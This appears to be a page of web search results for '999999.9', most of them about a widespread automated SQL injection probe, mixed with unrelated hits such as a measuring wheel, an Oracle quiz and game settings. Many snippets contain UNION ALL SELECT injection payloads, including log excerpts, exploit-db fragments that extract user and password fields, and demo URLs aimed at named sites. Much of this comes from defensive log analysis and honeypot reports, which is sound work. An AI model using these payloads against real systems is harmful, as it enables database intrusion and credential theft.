| |
http://siberia.is/eben/index.php?p=999999.9-Union-All-Select-0x31303235343830303536
999999.9 Union All Select 0x31303235343830303536. Posted on February 24, 2013 by admin. 20111201-203954.jpg. 20111130-202810.jpg. 20111130-202702.jpg. 20111130-192158.jpg. 20111125-153420.jpg ...
|
http://siberia.is/eben/index.php?p=999999.9-Union-All-Select-(select-Char(114)
999999.9 Union All Select (select Char(114). Posted on March 21, 2013 by admin. 999999.9 union all select (select char(114). 20111201-203954.jpg. 20111130-202810.jpg. 20111130-202702.jpg. 20111130-192158.jpg. 20111125-153420.
|
http://siberia.is/eben/index.php?p=999999.9-Union-All-Select-Null,(select-Cast(char(114)-Char(51)-Char(100)-Char(109)-Char(48)-Char(118)-Char(51)-Char(95)-Char(104)-Char(118)-Char(106)-Char(95)-Char(105)-Char(110)-Char(106)-Char(101)-Char(99)-Char(116)-Char(105)-Char(111)-Char(110)-As-Nvarchar(4000))),null
999999.9 Union All Select Null,(select Cast(char(114) Char(51) Char(100) Char(109) Char(48) Char(118) Char(51) Char(95) Char(104) Char(118) Char(106) Char(95) Char(105) Char(110) Char(106) Char(101) Char(99) ...
|
http://siberia.is/eben/index.php?p=999999.9-Union-All-Select-Null,null,(select-Cast(char(114)-Char(51)-Char(100)-Char(109)-Char(48)-Char(118)-Char(51)-Char(95)-Char(104)-Char(118)-Char(106)-Char(95)-Char(105)-Char(110)-Char(106)-Char(101)-Char(99)-Char(116)-Char(105)-Char(111)-Char(110)-As-Nvarchar(4000)))
999999.9 Union All Select Null,null,(select Cast(char(114) Char(51) Char(100) Char(109) Char(48) Char(118) Char(51) Char(95) Char(104) Char(118) Char(106) Char(95) Char(105) Char(110) Char(106) Char(101) ...
|
http://www.cnblogs.com/daly2008/archive/2013/02/20/2919168.html
未过滤的参数就是id,在程序中没有做校验。 查找问题的过程,通过分析nginx的log,发现大量如下的代码,其中xxxxxxxxxxx&id=是我的正常的参数. xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536-- ...
|
http://newmeasuringwheels.blog.com/2012/10/17/calculated-industries-6425-digital-measuring-wheel1-ft999999-9-ft/
CALCULATED INDUSTRIES 6425 Digital Measuring Wheel,1 Ft,999999.9 Ft by CALCULATED INDUSTRIES Electronic Measuring Wheel, Spoked, Wheel Circumference 3 1/4 Ft, Wheel Dia 12 9/16 In, Measurement Capacity ...
|
http://www.dhirajranka.com/?p=716
127.0.0.1 - - [14/Sep/2012:15:45:10 +0530] "GET /sqli.php?u=999999.9%27+union+all+select+%28select+concat%280x7e%2C0x27%2C0x7233646D3076335F68766A5F696E6A656374696F6E%2C0x27%2C0x7e%29+limit+0%2C1%29% ...
|
http://bot24.blogspot.com/2012/07/joomla-comodudeprofile-v2x-vulnerability.html
... demo1: http://genteagro.com/index.php?option=com_odudeprofile&view=search&profession=999999.9%27%20union%20all%20select%200x31303235343830303536%2C%28select%20concat%28username,0x3D ...
|
http://blog.spiderlabs.com/2012/12/honeypot-alert-sql-injection-scanning-detected-in-wordpress-error-logs.html
... id = 999999.9 UNION ALL SELECT 0x31303235343830303536,0x313032353438303035' at line 1 for query SELECT text, author_id, date FROM WHERE id = 999999.9 UNION ALL SELECT 0x31303235343830303536 ...
|
http://blog.163.com/cmdbat@126/blog/static/17029212320132183748518/
ID:999999.9' union all select (select concat(0x7e,0x27,0x7233646D3076335F68766A5F696E6A656374696F6E,0x27,0x7e) limit 0,1),0x31303235343830303536,0x31303235343830303536 and 'x'='x. ID:999999.9' union ...
|
http://kiminets.pixnet.net/blog/post/38839193-%E5%85%B8%E5%9E%8Bsql-injection%E6%94%BB%E6%93%8A%E6%89%8B%E6%B3%95
85.237.211.211 - - [16/Mar/2013:06:34:06 +0800] "GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 6728 ...
|
http://blog.opencs.org/2013/02/paypal-scam-hosted-by-comprimised.html
/napoli.php?id=999999.9 union all select 0x31303235343830303536,(select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 1,1) ...
|
http://www.wellgolly.com/?p=1364
... I could possible have such a malformed query. What clinched it for me are these queries: WHERE product_id = 999999.9/**//*!30000union/**/all/**/select/**/(select/**/concat(0x7e,0x27,group_concat(column_name),0x27 ...
|
http://minkara.carview.co.jp/userid/232367/blog/7984417/
「9999/99.9」のはずが!?」について - にかやま のブログです。Powered by みんカラ.
|
http://ocatutor.blogspot.com/2012/02/conversion-functions-answers.html
TO_DATE may convert date items to character items. 3. What value is returned after executing the following statement? SELECT TO_NUMBER(1234.49, '999999.9') FROM DUAL; (Choose the best answer.) a. 1234.49. b. 001234.5. c. 1234.5 ...
|
http://linux-101.org/script/dns-benchmarking-python-take-2
... open("DNS-Results-" + server + ".csv", "w") else: resultsDataFile = open("DNS-Results-" + server + ".csv", "a") count = 0 quickestTime = 999999.9 longestTime = 1.0 averageTime = 999999.9 totalTimeMS = 999999.9 print ...
|
http://www.exploit-db.com/exploits/22098/
component."&tag=999999.9' union all select 1,concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,".$pass.",0x3c706173733e)+from ".$table."--+a"; $res = $b->request(HTTP::Request->new(GET=>$host)); ...
|
http://www.modthegalaxy.com/forums/thread-player-npc-cloths-armor-not-showing
camerFarPlane=999999.9 cameraFarPlaneSpace=999999.9 rederDetailLevel=true renderProjectilePath=true renderLotManager=true ambientLightInCells=True fogDisable=True preloadPlayerMusicManager=True ...
|
http://www.exploit-db.com/exploits/22152/
999999.9 union all select (select concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,count(*),".$pass.",0x3c706173733e) from ".$table."),null--"; $res = $b->request(HTTP::Request->new(GET=>$host)); ...
|
http://bot24.blogspot.com/2012/10/webgin-sqli-vulnerability.html
cms.php?cms_id= http://www.site.com/folder/cms.php?cms_id=-999999.9 union all select 0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(tbl_energyca_admin.adminPword as char))),0x27,0x7e) from ...
|